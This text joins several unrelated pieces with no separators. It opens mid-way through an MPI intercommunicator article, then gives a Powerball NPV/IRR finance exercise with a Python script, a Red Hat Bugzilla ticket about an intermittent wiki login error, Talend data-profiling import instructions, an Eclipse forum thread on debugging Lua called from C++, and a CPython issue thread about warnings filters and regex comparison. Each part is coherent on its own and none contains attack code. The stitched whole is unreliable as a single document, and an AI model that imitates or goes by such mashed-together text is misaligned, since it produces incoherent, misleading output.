Next, local process leaders (those processes with a rank of zero in the new context) print out the sum of values received from the other process group members. The local process leaders have ranks of zero (BLACK leader), one (WHITE leader), and two (BLUE leader) in the global context.
The sums for BLACK and WHITE are 3; the sum for BLUE is 1. Finally, the BLACK members all report the values they sent over the intercommunicator; the WHITE members all report the values they received. It should be clear that BLACK 0 sent to WHITE 0, BLACK 1 sent to WHITE 1, and BLACK 2 sent to WHITE 2, which maps to 0 sending to 1, 3 sending to 4, and 6 sending to 7 in the global (MPI_COMM_WORLD) context.

A Lot of Power

As you can see, MPI offers a powerful set of tools for manipulating process groups and communicators. These constructs allow for good code modularity, portable parallel library creation, and easy coupling of multi-task models. In addition, intercommunicators can be established as needed to provide communications between process groups. This article rounds out a set of columns on advanced features of MPI. When MPI is used for message passing, some pretty neat things can be done on parallel computers.
Net Present Value & Rate of Return for a winning Powerball lottery ticket

Please see the attached file for further detail.

Question 2 - Net Present Value
You have just paid $20 million in the secondary market for the winning Powerball lottery ticket. The prize is $2 million at the end of each year for the next 25 years. If your required rate of return is 8 percent, what is the net present value (NPV) of the deal?

Internal Rate of Return
What is the internal rate of return (IRR) of the Powerball deal in question 2?

Modified Internal Rate of Return
What is the modified internal rate of return (MIRR) of the Powerball deal in question 2?

Expected Rate of Return of Corporate Bond
Assume that Intel Corporation's $1,000 face value, 9 percent coupon rate bond matures in 10 years and sells for $1,100. If you purchase the bond for $1,100 and hold it to maturity, what will be your average annual rate of return on the investment?

Solution Summary
The net present value and rate of return for a winning Powerball lottery ticket are determined, along with the internal rate of return.
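For reference, the numbers can be checked with a short script. This is an illustrative sketch, not part of the original solution; it uses the standard annuity present-value formula, simple bisection for the rate solvers, and assumes MIRR reinvestment at the 8 percent required return:

```python
def annuity_pv(payment, rate, years):
    # Present value of `payment` received at the end of each year for `years` years
    return payment * (1 - (1 + rate) ** -years) / rate

def bisect(f, lo, hi, tol=1e-9):
    # Find a root of f on [lo, hi]; f(lo) and f(hi) must bracket a sign change
    while hi - lo > tol:
        mid = (lo + hi) / 2
        if f(lo) * f(mid) <= 0:
            hi = mid
        else:
            lo = mid
    return (lo + hi) / 2

cost, payment, years = 20_000_000, 2_000_000, 25

# Question 2: NPV at an 8% required return
npv = annuity_pv(payment, 0.08, years) - cost
print(f"NPV  = ${npv:,.0f}")    # about $1.35 million

# IRR: the discount rate that makes NPV zero
irr = bisect(lambda r: annuity_pv(payment, r, years) - cost, 0.01, 0.20)
print(f"IRR  = {irr:.2%}")      # a bit under 9%

# MIRR: reinvest each prize at 8%, then annualize FV/cost over 25 years
reinvest = 0.08
fv = payment * ((1 + reinvest) ** years - 1) / reinvest
mirr = (fv / cost) ** (1 / years) - 1
print(f"MIRR = {mirr:.2%}")     # about 8.3%

# Bond: $1,000 face, $90 annual coupon, 10 years, price $1,100 -> yield to maturity
def bond_price(r, face=1000, coupon=90, n=10):
    return annuity_pv(coupon, r, n) + face / (1 + r) ** n

ytm = bisect(lambda r: bond_price(r) - 1100, 0.01, 0.20)
print(f"YTM  = {ytm:.2%}")      # roughly 7.5%
```

The premium price of the bond pulls its yield below the 9 percent coupon rate, which matches the qualitative answer expected here.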
Red Hat Bugzilla – Bug 1469467
[abrt] relval: login(): client.py:496:login:mwclient.errors.LoginError: (<Site object '('https', 'fedoraproject.org')/w/'>, {'result': 'WrongPass'})
Last modified: 2017-07-24 02:56:54 EDT

Created attachment 1296168 [details] File: backtrace
Created attachment 1296169 [details] File: cgroup
Created attachment 1296170 [details] File: cpuinfo
Created attachment 1296171 [details] File: environ
Created attachment 1296172 [details] File: mountinfo
Created attachment 1296173 [details] File: namespaces
Created attachment 1296174 [details] File: open_fds

As to the problem itself: the wiki sometimes seems to just *do* this, triggering a WrongPass error for a perfectly valid username/password combination. I've never been able to figure out why. If you actually did enter your password correctly, please just try this again, and if it works, there's nothing I can really do about this; it's some issue on the wiki side. If you *consistently* get a WrongPass error for what you think is the correct username and password, that's a different question.

It happened once.

Then yeah, it's some kind of intermittent mistake on the server side that I can't really do anything about on the client end, so I'm afraid we'll have to close the ticket. Sorry! I have asked our admins if they can figure out what's going wrong on the server end before (I see these same errors in my own use of relval/wikitcms sometimes), but they haven't been able to figure it out yet...
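Given that the failure is intermittent, one client-side mitigation (not something relval actually does; just a sketch) is to retry the login a few times before giving up. The helper below is plain Python; the mwclient call in the comment is only illustrative:

```python
import time

def retry(fn, exceptions, attempts=3, delay=0.0):
    # Call fn(); if it raises one of `exceptions`, try again, up to `attempts` times.
    last = None
    for _ in range(attempts):
        try:
            return fn()
        except exceptions as exc:
            last = exc
            if delay:
                time.sleep(delay)
    raise last

# With mwclient this might look like (hypothetical usage, not tested here):
#   retry(lambda: site.login(user, password), mwclient.errors.LoginError)

# Demonstration with a stub that fails twice, then succeeds:
calls = {"n": 0}
def flaky_login():
    calls["n"] += 1
    if calls["n"] < 3:
        raise RuntimeError("WrongPass")
    return "logged in"

print(retry(flaky_login, RuntimeError))  # "logged in" on the third attempt
```

A retry only papers over the server-side flakiness, of course, but it turns a one-off abrt crash into a transparent recovery.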
You can import data profiling items, including analyses, database connections, patterns and indicators, etc., into your current studio from various projects or different versions of the studio.

You can not import an item without all its dependencies. When you try to import an analysis, for example, all its dependencies, such as a metadata connection and the patterns and indicators used in this analysis, will be selected by default and imported with the analysis. However, when you import analyses from a reference project, only the analyses are imported, without their items. For example, metadata connections are not imported with them, and you must set the connection manually after importing the analyses to make them work correctly. For further information about reference projects, see Working with referenced projects.

Warning: You can not import into your current studio data profiling items created in versions older than 4.0.0. To use such items in your current studio, you must carry out an upgrade operation. For further information, see Upgrading project items from older versions.

If you have data integration items (Jobs, metadata connections, etc.) that you need to import alongside your data profiling items, you can do one of the following:

- Import the data integration items from the Integration perspective, and the data profiling items from the Profiling perspective of your studio. All items will be imported with their dependencies. For example, when you import a Job with data quality components, dependencies such as the metadata connection and the patterns used by the data quality components are imported as well.

Note: If you have connections shared between your data integration Jobs and your data profiling analyses, it is better to start by importing your data integration items and then move on to importing those of data profiling.
- Import data integration and data profiling items simultaneously from the studio login window, through importing the project file created in the studio of the older version. For further information about importing local projects from the login window, see How to import local projects.

Prerequisite(s): You have selected the Profiling perspective of the studio. You have access to the root directory of another studio version in which data profiling and data integration items have been created.

To import one or more data profiling items, do the following:

In the Profiling perspective, either:
- Right-click anywhere in the DQ Repository tree view and select Import Items.
- Click the icon on the toolbar and select Import Items.

All editors which are open in the studio are automatically closed. The [Import Item] wizard is displayed.

Select the root directory or the archive file option, according to whether the data profiling items you want to import are in the workspace file within the studio directory or are already exported into a zip file.
- If you select the root directory option, click Browse and set the path to the project folder containing the items to be imported within the workspace file of the studio directory. All items and their dependencies that do not exist in your current studio are selected by default in the dialog box.
- If you select the archive file option, click Browse and set the path to the archive file that holds the data profiling items you want to import. All items and their dependencies that do not exist in your current studio are selected by default in the dialog box.

Select the Overwrite existing items check box if some error and warning messages are listed in the Error and Warning area. This means that items with the same names already exist in the current studio. The imported items will replace the existing ones. When you import system indicators that are modified in a studio version, they will not overwrite the indicators in the current studio.
All modifications from older versions will be integrated with the system indicators in the current studio.

Select or clear the check boxes of the data profiling items you want or do not want to import, according to your needs. All dependencies of a selected item are selected by default. When you clear the check box of an item, the check boxes of the dependencies of this item are automatically cleared as well. Also, an error message will display on top of the dialog box if you clear the check box of any of the dependencies of the selected item.

Click Finish to validate the operation. The imported items display under the corresponding folders in the DQ Repository tree view.

You can also import local project folders from the login window of your studio. For further information, see the Getting Started Guide.

Do the following to have every item in the imported project working correctly:

- Run the analyses that have Java as their execution engine. This will compute and store locally the results of the indicators used in the analyses. You can not open a list of the indicator results in the Analysis Results view in the current studio without running the analyses first, as data is not imported with them from the old studio.

- Install missing third-party Java libraries or database drivers. When you import database connections for the first time, warning red icons may be docked on the connection names. This is because the required external modules (third-party Java libraries or database drivers) are missing from the studio. For more information about identifying and installing external modules, see the Talend Installation Guide.

- Set the path for the drivers of the SQL Servers (2005 or 2008). If you import SQL Server (2005 or 2008) connections into your current studio, a warning red icon is docked on the connection names in the DB connections folder. This indicates that the driver path for these connections is empty.
You must open the connection wizard and redefine the connection manually to set the path to a JDBC driver, which you can download from the Microsoft download center. For further information on editing a database connection, see How to open or edit a database connection. You can also set the path to a JDBC driver for a group of database connections simultaneously, in order not to define them one by one. For further information, see Migrating a group of connections.
Eclipse Community Forums: how to debug like the tool "decoda"?

Guangcheng Huang (2012-11-09):
I wrote some functions in an x.lua file, and I call the Lua functions from my C program. I want to debug the Lua function called by the C program using Koneki/LDT, just like the tool "decoda". How can I do that?

Marc Aubry (2012-11-09):
Hi Guangcheng,
Maybe by using the "Attach Debug" as explained here:
If you use a 0.9 version of LDT, a better and more complete documentation can be found here:
And download the debugger file here.
If it doesn't work, please explain your case with more details.
Marc

Marc Aubry (2012-11-09):
edit: duplicate message -_-

Guangcheng Huang (2012-11-10):
thank you!

Guangcheng Huang (2012-11-13):
1. My Lua file is:

-- t.lua
function L_add(x, y)
    return x + y
end

2. My C++ program file is:

// test.cpp
#include <stdio.h>

#ifdef __cplusplus
extern "C" {
#endif /* __cplusplus */
#include <lua.h>     /* Lua is written in pure C */
#include <lualib.h>
#include <lauxlib.h>
#ifdef __cplusplus
}
#endif /* __cplusplus */

lua_State* L = NULL;

int Add(int x, int y)
{
    int savedTop = lua_gettop(L);
    int sum = 0;

    lua_getglobal(L, "L_add");  /* 'L_add' is the function defined in t.lua */
    lua_pushnumber(L, x);       /* the first argument */
    lua_pushnumber(L, y);       /* the second argument */
    lua_call(L, 2, 1);          /* call the function with 2 arguments, 1 result */
    sum = (int) lua_tonumber(L, -1);
    lua_pop(L, 1);
    lua_settop(L, savedTop);
    return sum;
}

int main(int argc, char* argv[])
{
    L = luaL_newstate();
    if (!L) {
        return -1;
    }
    luaL_dofile(L, "t.lua");
    while (true) {
        int sum = Add(10, 15);
        printf("The sum is %d\n", sum);
        //sleep(1);
    }
    lua_close(L);
    return 0;
}

3. In the C++ program, it calls the Lua function 'L_add'.
Now I want to use Koneki/LDT to debug it. I toggle a breakpoint in the 'L_add' function and start the C++ program. I expect the breakpoint to be hit when 'L_add' is called from the C++ program. I am really confused about how to do that, even after reading the manual you gave me. Would you please tell me step by step? Thank you very much! In addition, I suggest writing the manual around runnable examples, step by step. You are welcome to use my code snippet here! (PS: some diagrams in the manual don't match the 0.9 milestone executable version itself.)

Guangcheng Huang (2012-12-05):
Are you there, my friend??

Marc Aubry (2012-12-10):
Hi Guangcheng,
Sorry for the late response. Can you be a bit more precise about what you don't understand in the documentation? Maybe some points are unclear. Otherwise, here are some simple steps to perform Lua attached debugging:

First, ensure the Lua code is really called, by putting a print in the Lua file, or by returning a value and retrieving it in the C code.
Requirement: the Lua global variable "package.path" must contain a path to the luasocket libraries/binaries.

1. Add the following line at the beginning of your Lua file:

require("debugger")()

-- t.lua
function L_add(x, y)
    return x + y
end

2. Create and launch an attach debug configuration using the "Run/Debug Configuration" top menu. You don't have to configure the launch configuration, as the default values are fine.

3. Launch the C program to call the Lua code.

Please tell me if you still have some trouble.
Marc
Created on 2016-11-14 12:56 by vstinner, last changed 2016-11-22 08:47 by vstinner. This issue is now closed.

The issue #23839 modified the test runner to always clear caches before running tests. As a side effect, test_warnings started to complain with:

Warning -- warnings.filters was modified by test_warnings

The issue comes from the following function of test_warnings/__init__.py:

def setUpModule():
    py_warnings.onceregistry.clear()
    c_warnings.onceregistry.clear()

I suggest rewriting this function as a setUp/tearDown method in BaseTest that *restores* the old value of these dictionaries. I guess that the bug affects all Python versions, even if only Python 3.7 logs a warning.

How did you get this warning? I can't reproduce it.

> How did you get this warning? I can't reproduce it.

Sorry, I forgot to mention that the warning only occurs if you run Python with -Werror:

haypo@selma$ ./python -Werror -m test test_warnings
Run tests sequentially
0:00:00 [1/1] test_warnings
Warning -- warnings.filters was modified by test_warnings
test_warnings failed (env changed)
1 test altered the execution environment: test_warnings
Total duration: 2 sec
Tests result: SUCCESS

Moreover, the warning goes away if you run tests in verbose mode!?

haypo@selma$ ./python -Werror -m test -v test_warnings
...
1 test OK.
Total duration: 2 sec
Tests result: SUCCESS

test___all__ shows the same behaviour:

./python -Werror -m test test___all__
Run tests sequentially
0:00:00 [1/1] test___all__
Warning -- warnings.filters was modified by test___all__
test___all__ failed (env changed)
1 test altered the execution environment: test___all__
Total duration: 1 sec
Tests result: SUCCESS
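The rewrite suggested in the report (snapshot the registries in setUp(), restore them in tearDown()) could look roughly like the sketch below. The mixin name is made up, and a plain dict stands in for py_warnings.onceregistry / c_warnings.onceregistry so the sketch is self-contained:

```python
import unittest

class RegistrySnapshotMixin:
    """Save the once-registries in setUp and restore them in tearDown,
    instead of clearing them for good as setUpModule() does."""

    registries = []  # dicts to protect, e.g. [py_warnings.onceregistry, ...]

    def setUp(self):
        self._saved = [dict(reg) for reg in self.registries]
        for reg in self.registries:
            reg.clear()

    def tearDown(self):
        for reg, saved in zip(self.registries, self._saved):
            reg.clear()
            reg.update(saved)

# Stand-in for the real onceregistry dictionaries:
fake_registry = {("message", UserWarning, 1): True}

class BaseTest(RegistrySnapshotMixin, unittest.TestCase):
    registries = [fake_registry]

    def test_registry_is_empty_during_test(self):
        # Each test starts from a clean registry...
        self.assertEqual(fake_registry, {})

suite = unittest.defaultTestLoader.loadTestsFromTestCase(BaseTest)
result = unittest.TextTestRunner(verbosity=0).run(suite)
print("restored:", fake_registry)  # ...but the old contents come back afterward
```

The difference from the existing setUpModule() is that the global state observed by later tests (and by regrtest's environment check) is left exactly as it was found.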
The environment warning was already fixed by the issue #18383 (duplicate: issue #26742): New changeset f57f4e33ba5e by Martin Panter in branch '3.5': Issue #18383: Avoid adding duplicate filters when warnings is reloaded The problem is that _sre.SRE_Pattern doesn't import rich compare: so two patterns are only equal if it's exactly the same object... which is likely when re caches the compiled expression... But the Python test runner now starts by clearing the re cache! I see different options: * Find something else to not re-initialize warning filters, "_processoptions(sys.warnoptions)" in warnings.py. * Fix warnings._add_filter() to implement a custom comparator operator for regular expression objects: compare pattern and flags * Implement comparision in _sre.SRE_Pattern > * Implement comparision in _sre.SRE_Pattern I wrote a patch and opened the issue #28727: "Implement comparison (x==y and x!=y) for _sre.SRE_Pattern". > * Fix warnings._add_filter() to implement a custom comparator operator for regular expression objects: compare pattern and flags Attached patch warnings_key.patch implements this. I really dislike the patch :-( FYI Python 2.7 is not impacted by this bug because it seems like reimporting warnings.py twice gets a new fresh list from _warnings.filters. I don't undertand how/why. I didn’t really like adding the _add_filter() special handling in the first place, but I went ahead because I couldn’t think of a better way to avoid the problem with reloading the warnings modules. So unless anyone can suggest anything better, I am okay with your patch (even if you dislike it :). + return (item[0], _pattern_key(item[1]), item[2], _pattern_key(item[3])) The key is based on (action, message, category, module). I think you should add item[4] (lineno). > The key is based on (action, message, category, module). I think you should add item[4] (lineno). Oops, right! 
Ok, let me propose a plan for 3.5, 3.6 and 3.7:

* Remove the warnings.filters test on Python 3.5 from regrtest.
* Implement comparison for SRE_Pattern in Python 3.6 and 3.7: issue #28727.

I consider that the issue #28727 is a minor enhancement and so is still good for Python 3.6. This way we avoid the ugly warnings_key.patch. Reminder: this issue only occurs in the Python test suite, which explicitly reloads modules. It should not occur in the wild.

Your plan LGTM. Here is another way to remember that the filter list has already been initialized. I made a new immortal _warnings.filters_initialized flag at the C level. It is actually a list so that it can be mutated and remembered across module reloads, but it is either empty (evaluates as false) or a single element: [True]. Also, Python 2 does get duplicated filters, but I guess there is no test that exposes it:

$ python2 -Wall
>>> import warnings
>>> len(warnings.filters)
5
>>> reload(warnings)
<module 'warnings' from '/usr/lib/python2.7/warnings.pyc'>
>>> len(warnings.filters)
6

I agree there is no need to change Python 2 at this stage.

New changeset 75b1091594f8 by Victor Stinner in branch '3.5':
Issue #28688: Remove warnings.filters check from regrtest
New changeset a2616863de06 by Victor Stinner in branch '3.6':
Issue #28688: Null merge 3.5
New changeset da042eec6743 by Victor Stinner in branch 'default':
Issue #28688: Null merge 3.6

I implemented the x==y operator for _sre.SRE_Pattern in Python 3.6 and 3.7; it fixed this issue. For Python 3.5, I removed the warnings.filters test, as we discussed.

@Martin Panter: immortal-filters.patch works, but I'm not super excited by the change. Somehow, it looks like a hack... even if I don't see any better solution for Python 3.5. Since the bug only impacts the Python test suite in practice, is it really worth fixing in Python 3.5, which is almost in the "security fix only" stage?

@Martin: It's up to you, I have no strong opinion on your patch.
> I agree there is no need to change Python 2 at this stage.

Ok. As long as we are restricted by backwards compatibility, it will be hard to find a hack-free solution. The ideal solution IMO is to re-create _warnings.filters from scratch when _warnings is reloaded, but such a change would be safe only for 3.7. So I am happy to leave things as they are. At least until something upsets things again :)

I'm ok to close this bug :-)

> As long as we are restricted by backwards compatibility, it will be hard to find a hack-free solution. The ideal solution IMO is to re-create _warnings.filters from scratch when _warnings is reloaded, but such a change would be safe only for 3.7.

Currently it's not possible to "reload" the _warnings module, since it doesn't use the "module state" API. I don't see how you want to trigger an action in the _warnings module itself when it is "reloaded". Filters are used internally in the _warnings C module. Maybe we need to enhance the _warnings C module to use the "module state" API? (Is it the PEP 489?)